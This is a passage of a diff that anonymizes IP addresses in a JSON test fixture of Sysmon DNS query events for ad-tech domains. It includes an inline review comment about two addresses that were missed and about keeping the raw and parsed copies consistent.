+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "opcode": "Info",
@@ -7094,7 +7094,7 @@
 "ProcessId": "2736",
 "QueryName": "grey.erne.co",
 "QueryStatus": "0",
- "QueryResults": "::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:08.552",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -7110,7 +7110,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7127,7 +7127,7 @@
 "ProcessId": "2736",
 "QueryName": "sync.jivox.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "version": 5,
@@ -7155,7 +7155,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -7164,7 +7164,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 
UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
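Review bot: The new-side QueryResults list in this hunk still carries `::ffff:198.7.56.229;::ffff:198.7.56.231;` unchanged between runs of `89.160.20.156`, while every neighbouring public address in the same answer list was rewritten, and the same two addresses survive in the parsed `event_data.QueryResults` copy in the -7188 hunk just below. If the substitution was done by pattern rather than by reviewing each address this looks like a miss rather than an intended exception, and if 198.7.56.0/24 is not in the allowed test-IP set the check this change is meant to satisfy will still flag the file. The IPv6 answers (`2001:503:a83e::2:30` and the other `2001:5xx:` entries) appear to be real public addresses that were also left as-is, which is only fine if that check is IPv4-only — worth confirming. Whatever is decided, `event.original` and `event_data.QueryResults` must keep matching each other, as they do now.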
@@ -7188,7 +7188,7 @@ "ProcessId": "2736", "QueryName": "b1sync.zemanta.com", "QueryStatus": "0", - "QueryResults": "type: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5", + "QueryResults": "type: 5 
b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -7219,7 +7219,7 @@ "event_data": { "QueryName": "tg.socdm.com", "QueryStatus": "0", - "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.619", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7236,7 +7236,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -7248,7 +7248,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7274,7 +7274,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;", + "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.620", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7297,7 +7297,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 